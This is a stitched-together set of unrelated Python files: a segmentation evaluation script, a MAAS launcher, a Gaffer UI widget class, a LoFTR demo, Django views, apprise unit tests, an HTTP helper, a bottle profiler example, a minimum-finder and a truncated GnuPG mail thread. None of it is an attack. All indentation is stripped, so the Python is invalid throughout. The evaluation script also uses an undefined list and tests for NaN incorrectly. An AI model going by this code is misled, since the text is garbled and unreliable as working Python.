pixel_recall_list = [[],[],[],[],[]]
pixel_precision_list = [[],[],[],[],[]]
pixel_IOU_list = [[],[],[],[],[]]
bbox_iou_list = []
bbox_threshold = 0.5
# Loop all testing images
for image_name in os.listdir(testPath):
print(image_name)
#print(img)
#image_name = "grid1_roi2_500kx_0p5nm_haadf1_0039.jpg"
image = cv2.imread(testPath +"/" +image_name)
#imshow(image)
# prepare gt mask
catIds = coco.getCatIds()
imgIds = coco.getImgIds(catIds=catIds );
gt_labels = list()
bboxes = []
with open('../datasets/annotations/val.json') as json_data:
annotation = json.loads(json_data.read())
images = annotation['images']
for i in range(len(images)):
if(images[i]["file_name"] == image_name):
imgId = images[i]["id"]
seg = annotation['annotations']
for i in range(len(seg)):
if seg[i]['image_id'] == imgId:
gt_labels.append(seg[i]['category_id'])
bboxes.append(seg[i]['bbox'])
img = coco.loadImgs(imgId)[0]
annIds = coco.getAnnIds(imgIds=img['id'], catIds=catIds, iscrowd=None)
anns = coco.loadAnns(annIds)
#plt.imshow(image)
#coco.showAnns(anns)
gt_allMask = np.zeros(coco.annToMask(anns[0]).shape)
gt_type1Mask = np.zeros(coco.annToMask(anns[0]).shape)
gt_type2Mask = np.zeros(coco.annToMask(anns[0]).shape)
gt_type3Mask = np.zeros(coco.annToMask(anns[0]).shape)
gt_type4Mask = np.zeros(coco.annToMask(anns[0]).shape)
# get the mask for each class
for i in range(len(anns)):
if gt_labels[i] == 1:
gt_type1Mask += coco.annToMask(anns[i])
gt_type1Mask[gt_type1Mask >= 2] = 1
if gt_labels[i] == 2:
gt_type2Mask += coco.annToMask(anns[i])
gt_type2Mask[gt_type2Mask >= 2] = 1
if gt_labels[i] == 3:
gt_type3Mask += coco.annToMask(anns[i])
gt_type3Mask[gt_type3Mask >= 2] = 1
if gt_labels[i] == 4:
gt_type4Mask += coco.annToMask(anns[i])
gt_type4Mask[gt_type4Mask >= 2] = 1
gt_allMask += coco.annToMask(anns[i])
gt_mask_list = [[],[],[],[]]
for i in range(len(anns)):
if gt_labels[i] == 1:
gt_mask_list[0].append(coco.annToMask(anns[i]))
if gt_labels[i] == 2:
gt_mask_list[1].append(coco.annToMask(anns[i]))
if gt_labels[i] == 3:
gt_mask_list[2].append(coco.annToMask(anns[i]))
if gt_labels[i] == 4:
gt_mask_list[3].append(coco.annToMask(anns[i]))
#plt.imshow(gt_allMask)
# begin predication
# compute predictions
predictions = coco_demo.run_on_opencv_image(image)
cv2.imwrite(image_name, predictions)
mask, labels = coco_demo.get_predicted_mask_labels(image) # mask is predicted mask
#print(mask[0])
print(len(labels))
print(len(mask))
print(len(anns))
# TODO : new_labels is the pred_labels to avoid labels for gt
new_labels = np.zeros(len(labels))
for i in range(len(labels)):
new_labels[i] = labels[i].item()
#print(new_labels)
pred_mask = np.zeros((1024,1024,4))
# generate predict mask
allgtBG = np.zeros((1024,1024,4))
allpredBG = np.zeros((1024,1024,4))
for i in range(len(new_labels)):
maxIoU = 0
maxLabel = 0
currentPredMask = mask[i][0]
allpredBG[:,:,int(new_labels[i])-1] = allpredBG[:,:,int(new_labels[i])-1] + currentPredMask
for j in range(len(gt_mask_list)):
for gtMask in gt_mask_list[j]:
allgtBG[:,:,int(new_labels[i])-1] = allgtBG[:,:,int(new_labels[i])-1] + gtMask
# addAllBG = allgtBG + allpredBG
# BGIntersection = 1024*1024 - np.count_nonzero(addAllBG)
# UnionHelperMat = np.zeros((1024,1024))
# UnionHelperMat[np.where(allgtBG == 0)] = 1
# UnionHelperMat[np.where(allpredBG == 0)] = 1
# BGUnion = np.count_nonzero(UnionHelperMat)
for i in range(len(new_labels)):
if new_labels[i] == 1:
pred_mask[:,:,0] += mask[i][0]
if new_labels[i] == 2:
pred_mask[:,:,1] += mask[i][0]
if new_labels[i] == 3:
pred_mask[:,:,2] += mask[i][0]
if new_labels[i] == 4:
pred_mask[:,:,3] += mask[i][0]
#plt.imshow(pred_mask[:,:,0])
type1_pred = [];
type2_pred = [];
type3_pred = [];
type4_pred = [];
allTypes_pred = [];
class_ids = [1,2,3,4]
mask1 = np.zeros((1024,1024)) # 111 prediction for this image
mask2 = np.zeros((1024,1024))
mask3 = np.zeros((1024,1024))
mask4 = np.zeros((1024,1024))
allmask = np.zeros((1024,1024))
mask = pred_mask
#print(class_ids)
for j in range(len(class_ids)):
this_channel = mask[:,:,j]
class_id = class_ids[j]
# print(np.count_nonzero(this_channel))
if class_id == 1:
mask1 = mask1 + this_channel
mask1[mask1 >= 2] = 1
elif class_id == 2:
mask2 = mask2 + this_channel
mask2[mask2 >= 2] = 1
elif class_id == 3:
mask3 = mask3 + this_channel
mask3[mask3 >= 2] = 1
else:
mask4 = mask4 + this_channel
mask4[mask4 >= 2] = 1
allmask = allmask + this_channel
allmask[allmask >= 2] = 1
# 111 loop
TP = np.zeros(5)
TN = np.zeros(5)
masks_list = [mask1,mask2,mask3,mask4,allmask]
gt_mask_list = [gt_type1Mask,gt_type2Mask,gt_type3Mask,gt_type4Mask,gt_allMask]
for i in range(5):
TP[i] = np.count_nonzero((masks_list[i] + gt_mask_list[i]) >= 2)
TN[i] = 1024*1024 - np.count_nonzero(masks_list[i] + gt_mask_list[i])
pixel_acc = (TP[i] + TN[i])/(1024*1024)
if TP[i] == 0:
pixel_recall = 0
pixel_prec = 0
pixel_IOU = 0
else:
pixel_recall = TP[i]/np.count_nonzero(gt_mask_list[i])
pixel_prec = TP[i]/np.count_nonzero(masks_list[i])
pixel_IOU = TP[i]/(1024*1024-TN[i])
if pixel_recall == float('nan'):
pixel_recall = 0
if pixel_recall == 0 or pixel_recall == float('nan'):
pixel_prec = 0
pixel_acc_list[i].append(pixel_acc)
pixel_recall_list[i].append(pixel_recall)
pixel_precision_list[i].append(pixel_prec)
pixel_IOU_list[i].append(pixel_IOU)
print("Recall: Type " + str(i) + ":" + str(pixel_recall))
print("Precision: Type " + str(i) + ":" + str(pixel_prec))
print("IoU: Type " + str(i) + ":" + str(pixel_IOU))
print("Type " + str(i) + ":" + str(pixel_acc))
############################################################################################################
# pred_bboxes, pred_labels = coco_demo.get_bbox(image)
# # print("length of predicted boxes:", pred_bboxes.shape)
# # print("length of gt boxes:", len(bboxes))
# # print("length of labels:", len(labels))
# gt_bbox_map = np.zeros((1024,1024,len(bboxes))) # each channel is one gt defect, pixel level => IoU
# pred_bbox_map = np.zeros((1024,1024,len(pred_bboxes)))
# for i in range(len(bboxes)):
# start_i = int(bboxes[i][0])
# end_i = int(bboxes[i][2]+bboxes[i][0])
# start_j = int(bboxes[i][1])
# end_j = int(bboxes[i][1]+bboxes[i][3])
# gt_bbox_map[start_i:end_i,start_j:end_j,i] = 1
# for i in range(len(pred_bboxes)):
# start_i = int(pred_bboxes[i][0])
# end_i = int(pred_bboxes[i][1])#int(pred_bboxes[i][2]+pred_bboxes[i][0])
# start_j = int(pred_bboxes[i][2])#int(pred_bboxes[i][1])
# end_j = int(pred_bboxes[i][3])#int(pred_bboxes[i][1]+pred_bboxes[i][3])
# pred_bbox_map[start_i:start_j,end_i:end_j,i] = 1
# index_list = [] # store which pred correspond to which gt
# iou_list = []
# label_list = []
# for i in range(len(pred_bboxes)):
# max_threshold = 0
# max_label = 0
# max_index = -1
# for j in range(len(bboxes)):
# bbox_interaction = np.count_nonzero((pred_bbox_map[:,:,i]+gt_bbox_map[:,:,j]) >= 2)
# bbox_union = np.count_nonzero(pred_bbox_map[:,:,i]+gt_bbox_map[:,:,j])
# bbox_iou = bbox_interaction/bbox_union
# if bbox_iou > max_threshold:
# max_threshold = bbox_iou
# max_index = j
# max_label = gt_labels[j]
# index_list.append(max_index)
# iou_list.append(max_threshold)
# label_list.append(max_label)
# for i in range(len(pred_bboxes)):
# if index_list[i] == -1:
# continue
# if iou_list[i] > iou_threshold:
# if label_list[i] == pred_labels[i]:
# bbox_iou_list.append(iou_list[i])
# print(index_list)
###################################################################################################
for i in range(5):
print(sum(pixel_acc_list[i]) / len(os.listdir(testPath)))
print(sum(pixel_recall_list[i]) / len(os.listdir(testPath)))
print(sum(pixel_precision_list[i]) / len(os.listdir(testPath)))
print(sum(pixel_IOU_list[i]) / len(os.listdir(testPath)))
# print(sum(bbox_iou_list)/len(bbox_iou_list))
print("===============================================")
|
import gettext
import provision.maas
from guacamole import Command
_ = gettext.gettext
class Launcher(Command):
name = 'launcher'
def __init__(self):
self.launcher = None
self.provision = None
super().__init__()
def register_arguments(self, parser):
parser.add_argument(
'launcher', nargs='?',
help=_("Launcher definition file to use"))
def invoked(self, ctx):
self.launcher = ctx.cmd_toplevel.launcher
config_yaml = self.launcher.config_yaml['maas']
self.provision = provision.maas.MaaS(config_yaml)
self.provision.create_pool()
if 'pods' in config_yaml:
self.provision.create_nodes()
else:
self.provision.create_node()
print("The launcher is created by {}".format(ctx.args.launcher))
print("The config content is \n{}".format(self.launcher.config_yaml))
print("Creating the pod...")
self.provision.create_pod()
print("Updating the interface of the nodes of the pod...")
self.provision.update_interface()
print("Deploying the nodes")
self.provision.deploy_nodes()
print("All known nodes specified distro are deployed.")
|
##########################################################################
#
# Copyright (c) 2011, John Haddon. All rights reserved.
# Copyright (c) 2011-2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import IECore
import GafferUI
QtGui = GafferUI._qtImport( "QtGui" )
QtCore = GafferUI._qtImport( "QtCore" )
## The ListContainer holds a series of Widgets either in a column or a row.
# It attempts to provide a list like interface for manipulation of the widgets.
class ListContainer( GafferUI.ContainerWidget ) :
Orientation = IECore.Enum.create( "Vertical", "Horizontal" )
HorizontalAlignment = GafferUI.Enums.HorizontalAlignment
VerticalAlignment = GafferUI.Enums.VerticalAlignment
def __init__( self, orientation=Orientation.Vertical, spacing=0, borderWidth=0, **kw ) :
GafferUI.ContainerWidget.__init__( self, QtGui.QWidget(), **kw )
if orientation==self.Orientation.Vertical :
self.__qtLayout = QtGui.QVBoxLayout()
else :
self.__qtLayout = QtGui.QHBoxLayout()
self.__qtLayout.setSpacing( spacing )
self.__qtLayout.setContentsMargins( borderWidth, borderWidth, borderWidth, borderWidth )
self.__qtLayout.setSizeConstraint( QtGui.QLayout.SetMinAndMaxSize )
self._qtWidget().setLayout( self.__qtLayout )
self.__orientation = orientation
self.__widgets = []
def orientation( self ) :
return self.__orientation
def append( self, child, expand=False, horizontalAlignment=None, verticalAlignment=None ) :
assert( isinstance( child, GafferUI.Widget ) )
oldParent = child.parent()
if oldParent is not None :
oldParent.removeChild( child )
self.__widgets.append( child )
stretch = 1 if expand else 0
self.__qtLayout.addWidget( child._qtWidget(), stretch, self.__convertToQtAlignment( horizontalAlignment, verticalAlignment ) )
child._applyVisibility()
def remove( self, child ) :
self.removeChild( child )
def insert( self, index, child, expand=False, horizontalAlignment=None, verticalAlignment=None ) :
l = len( self.__widgets )
if index > l :
index = l
oldParent = child.parent()
if oldParent is not None :
oldParent.removeChild( child )
self.__widgets.insert( index, child )
stretch = 1 if expand else 0
self.__qtLayout.insertWidget( index, child._qtWidget(), stretch, self.__convertToQtAlignment( horizontalAlignment, verticalAlignment ) )
child._applyVisibility()
def index( self, child ) :
return self.__widgets.index( child )
def __setitem__( self, index, child ) :
# Shortcut if there would be no change. Rearranging
# things in Qt is extremely costly and this test is
# trivial in comparison, so this is well worth doing.
if self.__widgets[index] == child :
return
if isinstance( index, slice ) :
assert( isinstance( child, list ) )
children = child
insertionIndex = index.start if index.start is not None else 0
else :
children = [ child ]
insertionIndex = index
expands = []
for i in range( insertionIndex, insertionIndex + len( children ) ) :
if i < len( self ) :
expands.append( self.__qtLayout.stretch( i ) > 0 )
else :
expands.append( False )
del self[index]
# It's very important that we insert widgets in the order in which
# they are to appear visually, because qt will define the tab-focus
# chain order based on order of insertion, and not based on the order
# of visual appearance. It's still possible to make several calls to
# __setitem__ out of sequence and end up with bad focus orders, but
# at least this way a slice set at one time will be in the correct order.
#
# Investigation into a method of achieving perfect ordering all the
# time didn't yield anything better than this. One attempt called
# setTabOrder() for every child, starting with the last child - this
# worked when the children of the ListContainer where childless,
# but not when they had children. Another possibility was to reimplement
# QWidget.focusNextPrevChild() at the GafferUI.Window level, iterating
# through the focus chain as for QApplicationPrivate::focusNextPrevChild_helper(),
# but using knowledge of Container order to override the sequence where
# necessary. This seemed like it might have promise, but is not straightforward.
for i in range( 0, len( children ) ) :
self.insert( insertionIndex + i, children[i], expands[i] )
def __getitem__( self, index ) :
return self.__widgets[index]
def __delitem__( self, index ) :
if isinstance( index, slice ) :
indices = range( *(index.indices( len( self ) )) )
for i in indices :
self[i]._qtWidget().setParent( None )
self[i]._applyVisibility()
del self.__widgets[index]
else :
self.__widgets[index]._qtWidget().setParent( None )
self.__widgets[index]._applyVisibility()
del self.__widgets[index]
def __len__( self ) :
return len( self.__widgets )
def __convertToQtAlignment( self, horizontalAlignment, verticalAlignment):
if not horizontalAlignment and not verticalAlignment:
return QtCore.Qt.Alignment( 0 )
if verticalAlignment:
qtVerticalAlignment = GafferUI.VerticalAlignment._toQt( verticalAlignment )
else:
qtVerticalAlignment = QtCore.Qt.Alignment( 0 )
if horizontalAlignment:
qtHorizontalAlignment = GafferUI.HorizontalAlignment._toQt( horizontalAlignment )
else:
qtHorizontalAlignment = QtCore.Qt.Alignment( 0 )
return qtHorizontalAlignment | qtVerticalAlignment
def addSpacer( self, width=0, height=0, expand=False, horizontalAlignment=None, verticalAlignment=None):
self.append( GafferUI.Spacer( IECore.V2i( width, height ) ), expand=expand, horizontalAlignment=horizontalAlignment, verticalAlignment=verticalAlignment )
def addChild( self, child, expand=False, horizontalAlignment=None, verticalAlignment=None ) :
self.append( child, expand=expand, horizontalAlignment=horizontalAlignment, verticalAlignment=verticalAlignment )
def removeChild( self, child ) :
self.__widgets.remove( child )
child._qtWidget().setParent( None )
child._applyVisibility()
def setExpand( self, child, expand ) :
self.__qtLayout.setStretchFactor( child._qtWidget(), 1 if expand else 0 )
def getExpand( self, child ) :
stretch = self.__qtLayout.stretch( self.index( child ) )
return stretch > 0
|
import os
import torch
import cv2
import numpy as np
import matplotlib.cm as cm
from src.utils.plotting import make_matching_figure
from src.loftr import LoFTR, default_cfg
# The default config uses dual-softmax.
# The outdoor and indoor models share the same config.
# You can change the default values like thr and coarse_match_type.
matcher = LoFTR(config=default_cfg)
matcher.load_state_dict(torch.load("weights/indoor_ds.ckpt")['state_dict'])
matcher = matcher.eval().cuda()
# Load example images
img0_pth = "assets/scannet_sample_images/scene0711_00_frame-001680.jpg"
img1_pth = "assets/scannet_sample_images/scene0711_00_frame-001995.jpg"
img0_raw = cv2.imread(img0_pth, cv2.IMREAD_GRAYSCALE)
img1_raw = cv2.imread(img1_pth, cv2.IMREAD_GRAYSCALE)
img0_raw = cv2.resize(img0_raw, (640, 480))
img1_raw = cv2.resize(img1_raw, (640, 480))
import datetime
starttime = datetime.datetime.now()
img0 = torch.from_numpy(img0_raw)[None][None].cuda() / 255.
img1 = torch.from_numpy(img1_raw)[None][None].cuda() / 255.
batch = {'image0': img0, 'image1': img1}
# Inference with LoFTR and get prediction
with torch.no_grad():
matcher(batch)
mkpts0 = batch['mkpts0_f'].cpu().numpy()
mkpts1 = batch['mkpts1_f'].cpu().numpy()
mconf = batch['mconf'].cpu().numpy()
endtime = datetime.datetime.now()
print ((endtime - starttime).microseconds)
color = cm.jet(mconf)
text = [
'LoFTR',
'Matches: {}'.format(len(mkpts0)),
]
fig = make_matching_figure(img0_raw, img1_raw, mkpts0, mkpts1, color, text=text)
|
from django.shortcuts import render
def index(request):
return render(request, 'pages/index.html')
def yandex(request):
return render(request, 'pages/yandex_c44e9dee4b34e712.html')
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2019 Chris Caron <lead2gold@gmail.com>
# All rights reserved.
#
# This code is licensed under the MIT License.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files(the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and / or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions :
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import six
import pytest
from datetime import datetime
from datetime import timedelta
from apprise.plugins.NotifyBase import NotifyBase
from apprise import NotifyType
from apprise import NotifyImageSize
from timeit import default_timer
# Disable logging for a cleaner testing output
import logging
logging.disable(logging.CRITICAL)
def test_notify_base():
"""
API: NotifyBase() object
"""
# invalid types throw exceptions
with pytest.raises(TypeError):
NotifyBase(**{'format': 'invalid'})
# invalid types throw exceptions
with pytest.raises(TypeError):
NotifyBase(**{'overflow': 'invalid'})
# Bad port information
nb = NotifyBase(port='invalid')
assert nb.port is None
nb = NotifyBase(port=10)
assert nb.port == 10
try:
nb.url()
assert False
except NotImplementedError:
# Each sub-module is that inherits this as a parent is required to
# over-ride this function. So direct calls to this throws a not
# implemented error intentionally
assert True
try:
nb.send('test message')
assert False
except NotImplementedError:
# Each sub-module is that inherits this as a parent is required to
# over-ride this function. So direct calls to this throws a not
# implemented error intentionally
assert True
# Throttle overrides..
nb = NotifyBase()
nb.request_rate_per_sec = 0.0
start_time = default_timer()
nb.throttle()
elapsed = default_timer() - start_time
# Should be a very fast response time since we set it to zero but we'll
# check for less then 500 to be fair as some testing systems may be slower
# then other
assert elapsed < 0.5
# Concurrent calls should achieve the same response
start_time = default_timer()
nb.throttle()
elapsed = default_timer() - start_time
assert elapsed < 0.5
nb = NotifyBase()
nb.request_rate_per_sec = 1.0
# Set our time to now
start_time = default_timer()
nb.throttle()
elapsed = default_timer() - start_time
# A first call to throttle (Without telling it a time previously ran) does
# not block for any length of time; it just merely sets us up for
# concurrent calls to block
assert elapsed < 0.5
# Concurrent calls could take up to the rate_per_sec though...
start_time = default_timer()
nb.throttle(last_io=datetime.now())
elapsed = default_timer() - start_time
assert elapsed > 0.5 and elapsed < 1.5
nb = NotifyBase()
nb.request_rate_per_sec = 1.0
# Set our time to now
start_time = default_timer()
nb.throttle(last_io=datetime.now())
elapsed = default_timer() - start_time
# because we told it that we had already done a previous action (now)
# the throttle holds out until the right time has passed
assert elapsed > 0.5 and elapsed < 1.5
# Concurrent calls could take up to the rate_per_sec though...
start_time = default_timer()
nb.throttle(last_io=datetime.now())
elapsed = default_timer() - start_time
assert elapsed > 0.5 and elapsed < 1.5
nb = NotifyBase()
start_time = default_timer()
nb.request_rate_per_sec = 1.0
# Force a time in the past
nb.throttle(last_io=(datetime.now() - timedelta(seconds=20)))
elapsed = default_timer() - start_time
# Should be a very fast response time since we set it to zero but we'll
# check for less then 500 to be fair as some testing systems may be slower
# then other
assert elapsed < 0.5
# Force a throttle time
start_time = default_timer()
nb.throttle(wait=0.5)
elapsed = default_timer() - start_time
assert elapsed > 0.5 and elapsed < 1.5
# our NotifyBase wasn't initialized with an ImageSize so this will fail
assert nb.image_url(notify_type=NotifyType.INFO) is None
assert nb.image_path(notify_type=NotifyType.INFO) is None
assert nb.image_raw(notify_type=NotifyType.INFO) is None
# Color handling
assert nb.color(notify_type='invalid') is None
assert isinstance(
nb.color(notify_type=NotifyType.INFO, color_type=None),
six.string_types)
assert isinstance(
nb.color(notify_type=NotifyType.INFO, color_type=int), int)
assert isinstance(
nb.color(notify_type=NotifyType.INFO, color_type=tuple), tuple)
# Create an object
nb = NotifyBase()
# Force an image size since the default doesn't have one
nb.image_size = NotifyImageSize.XY_256
# We'll get an object this time around
assert nb.image_url(notify_type=NotifyType.INFO) is not None
assert nb.image_path(notify_type=NotifyType.INFO) is not None
assert nb.image_raw(notify_type=NotifyType.INFO) is not None
# But we will not get a response with an invalid notification type
assert nb.image_url(notify_type='invalid') is None
assert nb.image_path(notify_type='invalid') is None
assert nb.image_raw(notify_type='invalid') is None
# Static function testing
assert NotifyBase.escape_html("<content>'\t \n</content>") == \
'<content>'  \n</content>'
assert NotifyBase.escape_html(
"<content>'\t \n</content>", convert_new_lines=True) == \
'<content>'  <br/></content>'
# Test invalid data
assert NotifyBase.split_path(None) == []
assert NotifyBase.split_path(object()) == []
assert NotifyBase.split_path(42) == []
assert NotifyBase.split_path(
'/path/?name=Dr%20Disrespect', unquote=False) == \
['path', '?name=Dr%20Disrespect']
assert NotifyBase.split_path(
'/path/?name=Dr%20Disrespect', unquote=True) == \
['path', '?name=Dr Disrespect']
# a slash found inside the path, if escaped properly will not be broken
# by split_path while additional concatinated slashes are ignored
# FYI: %2F = /
assert NotifyBase.split_path(
'/%2F///%2F%2F////%2F%2F%2F////', unquote=True) == \
['/', '//', '///']
# Test invalid data
assert NotifyBase.parse_list(None) == []
assert NotifyBase.parse_list(object()) == []
assert NotifyBase.parse_list(42) == []
result = NotifyBase.parse_list(
',path,?name=Dr%20Disrespect', unquote=False)
assert isinstance(result, list) is True
assert len(result) == 2
assert 'path' in result
assert '?name=Dr%20Disrespect' in result
result = NotifyBase.parse_list(',path,?name=Dr%20Disrespect', unquote=True)
assert isinstance(result, list) is True
assert len(result) == 2
assert 'path' in result
assert '?name=Dr Disrespect' in result
# by parse_list while additional concatinated slashes are ignored
# FYI: %2F = /
# In this lit there are actually 4 entries, however parse_list
# eliminates duplicates in addition to unquoting content by default
result = NotifyBase.parse_list(
',%2F,%2F%2F, , , ,%2F%2F%2F, %2F', unquote=True)
assert isinstance(result, list) is True
assert len(result) == 3
assert '/' in result
assert '//' in result
assert '///' in result
# Phone number parsing
assert NotifyBase.parse_phone_no(None) == []
assert NotifyBase.parse_phone_no(object()) == []
assert NotifyBase.parse_phone_no(42) == []
result = NotifyBase.parse_phone_no(
'+1-800-123-1234,(800) 123-4567', unquote=False)
assert isinstance(result, list) is True
assert len(result) == 2
assert '+1-800-123-1234' in result
assert '(800) 123-4567' in result
# %2B == +
result = NotifyBase.parse_phone_no(
'%2B1-800-123-1234,%2B1%20800%20123%204567', unquote=True)
assert isinstance(result, list) is True
assert len(result) == 2
assert '+1-800-123-1234' in result
assert '+1 800 123 4567' in result
# Give nothing, get nothing
assert NotifyBase.escape_html("") == ""
assert NotifyBase.escape_html(None) == ""
assert NotifyBase.escape_html(object()) == ""
# Test quote
assert NotifyBase.unquote('%20') == ' '
assert NotifyBase.quote(' ') == '%20'
assert NotifyBase.unquote(None) == ''
assert NotifyBase.quote(None) == ''
def test_notify_base_urls():
"""
API: NotifyBase() URLs
"""
# Test verify switch whih is used as part of the SSL Verification
# by default all SSL sites are verified unless this flag is set to
# something like 'No', 'False', 'Disabled', etc. Boolean values are
# pretty forgiving.
results = NotifyBase.parse_url('https://localhost:8080/?verify=No')
assert 'verify' in results
assert results['verify'] is False
results = NotifyBase.parse_url('https://localhost:8080/?verify=Yes')
assert 'verify' in results
assert results['verify'] is True
# The default is to verify
results = NotifyBase.parse_url('https://localhost:8080')
assert 'verify' in results
assert results['verify'] is True
# Password Handling
# pass keyword over-rides default password
results = NotifyBase.parse_url('https://user:pass@localhost')
assert 'password' in results
assert results['password'] == "pass"
# pass keyword over-rides default password
results = NotifyBase.parse_url(
'https://user:pass@localhost?pass=newpassword')
assert 'password' in results
assert results['password'] == "newpassword"
# password keyword can also optionally be used
results = NotifyBase.parse_url(
'https://user:pass@localhost?password=passwd')
assert 'password' in results
assert results['password'] == "passwd"
# pass= override password=
# password keyword can also optionally be used
results = NotifyBase.parse_url(
'https://user:pass@localhost?pass=pw1&password=pw2')
assert 'password' in results
assert results['password'] == "pw1"
# Options
results = NotifyBase.parse_url('https://localhost?format=invalid')
assert 'format' not in results
results = NotifyBase.parse_url('https://localhost?format=text')
assert 'format' in results
assert results['format'] == 'text'
results = NotifyBase.parse_url('https://localhost?format=markdown')
assert 'format' in results
assert results['format'] == 'markdown'
results = NotifyBase.parse_url('https://localhost?format=html')
assert 'format' in results
assert results['format'] == 'html'
results = NotifyBase.parse_url('https://localhost?overflow=invalid')
assert 'overflow' not in results
results = NotifyBase.parse_url('https://localhost?overflow=upstream')
assert 'overflow' in results
assert results['overflow'] == 'upstream'
results = NotifyBase.parse_url('https://localhost?overflow=split')
assert 'overflow' in results
assert results['overflow'] == 'split'
results = NotifyBase.parse_url('https://localhost?overflow=truncate')
assert 'overflow' in results
assert results['overflow'] == 'truncate'
# User Handling
# user keyword over-rides default password
results = NotifyBase.parse_url('https://user:pass@localhost')
assert 'user' in results
assert results['user'] == "user"
# user keyword over-rides default password
results = NotifyBase.parse_url(
'https://user:pass@localhost?user=newuser')
assert 'user' in results
assert results['user'] == "newuser"
# Test invalid urls
assert NotifyBase.parse_url('https://:@/') is None
assert NotifyBase.parse_url('http://:@') is None
assert NotifyBase.parse_url('http://@') is None
assert NotifyBase.parse_url('http:///') is None
assert NotifyBase.parse_url('http://:test/') is None
assert NotifyBase.parse_url('http://pass:test/') is None
|
import logging
import random
import shutil
import time
import requests
logger = logging.getLogger(__name__)
RANDOM_WAITING_TIME = 5000
def get(url, params):
"""
send get request
:param url: destination url
:param params: parameters to send
:return: response as json data
"""
try:
random_sleep_milliseconds = float(random.randint(0, RANDOM_WAITING_TIME)) / float(1000)
logger.debug("sleep in %f seconds", random_sleep_milliseconds)
time.sleep(random_sleep_milliseconds)
r = requests.get(url, params, headers={
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36"
})
return r.json()
except Exception as ex:
logger.error(ex)
return None
|
import bottle
from wsgi_lineprof.middleware import LineProfilerMiddleware
app = bottle.app()
@app.route("/hello/<name>")
def index(name):
return bottle.template("<b>Hello {{name}}</b>!", name=name)
app = LineProfilerMiddleware(app)
if __name__ == "__main__":
bottle.run(host="localhost", port=8080, app=app)
|
test=[1,456,7,6,55,9]
min=test[0]
for i in test:
if i<min:
min=i
print('最小数为:',min)
|
'''
Created on 13.06.2016
@author: Fabian Reiber
@version: 1.0
The MTASendThread will send the prepared re-encrypted mails to the recipient. If the origin mail was not
a re-encrypted mail, the thread needs to prepare the specific mail. It could be the correct mail or a
failure mail with the specific failure status. If it was not possible to send for the first time,
the thread waits and try it again after 1 hour. If it will fail again it will wait 2 hours until 3 days passed.
In that case it sends an error mail to the origin sender with the same send-process.
'''
import datetime
from smtplib import SMTPSenderRefused, SMTPRecipientsRefused, SMTPDataError
import smtplib
import socket
import threading
import time
from DistributerKeyManagement import DistributerKeyManager
from DistributerKeyManagementException.NoKeyException import NoKeyException
from DistributerManagement import DistributerManager
from DistributerManagementException.DBConnectionException import DBConnectionException
from DistributerManagementException.InvalidDistributerAddressException import InvalidDistributerAddressException
from DistributerManagementException.NoFingerprintException import NoFingerprintException
from GnuPGManagementCenter import GnuPGManager
from GnuPGManagementCenterException.NoDistributerKeyIDsException import NoDistributerKeyIDsException
from GnuPGManagementCenterException.SigningException import SigningException
from util import _util
from util.GnuPGSystemLogger import GnuPGSystemLogger
from utilException.NoMXRecordException import NoMXRecordException
class MTASendThread(threading.Thread):
__RETRY_FIRST_TIME = 3600 #1 hour
__RETRY_ELSE_TIME = 7200 # 2 hours
__SENDER_MSG_TIME = 259200 #3 days
"""
Need to lock the access to the signAndEncrypt method of GnuPGManager, because there
are read/write operations. If there are more then one MTASendThreads, it is possible,
that they get into a predicament.
"""
__SIGN_AND_ENCRYPTLOCK = threading.Lock()
def __init__(self, distAddr, senderAddr, userInfo, addrFingerprintKeyInf, distKeyIDSig, distKeys, addrMsgDict,
group=None, target=None, name=None, args=(), kwargs=None, *, daemon=None):
threading.Thread.__init__(self, group=group, target=target, name=name, args=args, kwargs=kwargs)
"""
Another temporary gnupg directory is necessary, because the other default temporary
directory can't be locked for the MTASendThreads.
"""
